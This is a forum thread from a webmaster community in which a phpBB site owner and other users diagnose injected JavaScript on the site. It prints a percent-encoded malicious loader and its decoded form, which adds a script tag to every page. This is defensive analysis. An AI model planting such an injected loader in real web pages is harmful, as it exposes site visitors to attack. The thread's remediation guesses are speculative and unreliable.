First thing I would do is contact my hosting company for some assistance in getting to the bottom of this. Without knowing if this is a hosted or dedicated, or vps server there is little we can do here without first contacting your host.

One thing you might try is to run a block of Javascript code...

<script type="text/javascript">
alert( unescape('%69%66%20%28%21%64%6F%63%75%6D%
65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%
27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%
3B%20%4A%53%53%32%20%3D%20%36%39%34%30%39%38%3B%20%4A%53%
53%33%20%3D%20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%
73%2F%73%75%62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%64%
75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%
20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%
6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%
73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%
20%27%2F%70%68%70%42%42%33%2F%73%74%79%6C%65%73%2F%73%75%
62%73%69%6C%76%65%72%32%2F%65%70%69%77%2F%63%68%65%63%6B%
2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%
75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%
64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%
73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%
69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%
28%6A%73%29%20%7D%3B%20'));
</script>

After doing something similar on my own machine, this is the resulting code:

if (!document.getElementById('JSSS'))
{
JSS1 = 59;
JSS2 = 694098;
JSS3 = '/phpBB3/styles/subsilver2/epiw/dummy.htm';
var js = document.createElement('script');
js.setAttribute('src', '/phpBB3/styles/subsilver2/epiw/check.js');
js.setAttribute('id', 'JSSS');
document.getElementsByTagName('head').item(0).appendChild(js)
};

This code is being run in every one of your javascript and CSS files, but all it's doing is creating a <script> tag in the head of every page the user views pointing to '/phpBB3/styles/subsilver2/epiw/check.js'. I highly recommend that you check this file to see what it contains.

Alright, I will definitely contact my host.

And Wesley, I can't check that file right now because it's currently deleted. But I will when it comes back. Though I am pretty sure whenever I opened it last time it was just blank.

If it's blank, then most likely your users' data/security was not compromised, unless whatever/whoever was putting this stuff in place is VERY good and either used this as a red herring to cover for a real virus somewhere else in your pages or somehow figured out how to use binary data in a .js file to compromise a user's system (highly unlikely). You could check the latter case by opening the file when it reappears with a binary/hex editor.

I had a similar issue until I found out that the hosting company itself would add codes to to the bottom of each page.

Welcome to WebmasterWorld King_Ato!

If you search Google for "expression(eval(unescape" you'll find a topic that discusses what this particular script may be doing, its very generic. Something to do with posting to the forums. I'd be changing passwords right now just to be on the safe side and contacting the host immediately if they are responsible for maintaining the install. There may be some sort of injection or cross scripting vulnerability taking place I think.

I just got a message from a user who has the same problem. I'm assuming people are searching and finding this thread, so I figure I should post an update here:

No, I have not found a solution yet, at least not a permanent one. My host went through and removed 72 iframes that they found injected. They thought that would solve it, but it didn't. I recently noticed however that a cgi-bin folder gets uploaded to my server several hours (maybe even a day) before the phpbb3 folder comes back. It apparently acts as a gateway to the virus. So what I've been doing is just deleting the cgi-bin whenever it comes. Just have to be sure check my server everyday to delete the cgi-bin asap so the phpbb3 folder can't come back and then that virus warning will never appear.

Hopefully my host will find a solution soon. If anybody else has any other ideas, I would love to hear them.

The virus is in the db. You'll need to restore the db from a date when the virus was not present based on my understanding although I could be wrong. It sure sounds like it though based on what you are describing. Hold on, there's another topic around here that may provide some further instructions...

SQL Injection Virus Problems
[webmasterworld.com...]

Hey guys, sorry to bump this thread again, but I've made a new discovery. I don't know how I didn't realize this before, but that cgi-bin folder that I mentioned (the gateway to the virus) only gets loaded on my server after I log in to my cpanel. If I don't log in to cpanel, the cgi-bin will never appear, and I have no virus to worry about. So this probably means that there's a very simple solution to this, but I'm not web-savvy enough to know what it is. What is happening when I log into my cpanel?

And thanks for that link pageone, though I couldn't really figure out a solution from it.

[edited by: King_Ato at 8:05 am (utc) on June 30, 2008]

Did you report it to cpanel?
[cpanel.net...]

If it's a hole in the application, I'm sure they'll release a fix that will remedy whatever it is that got you.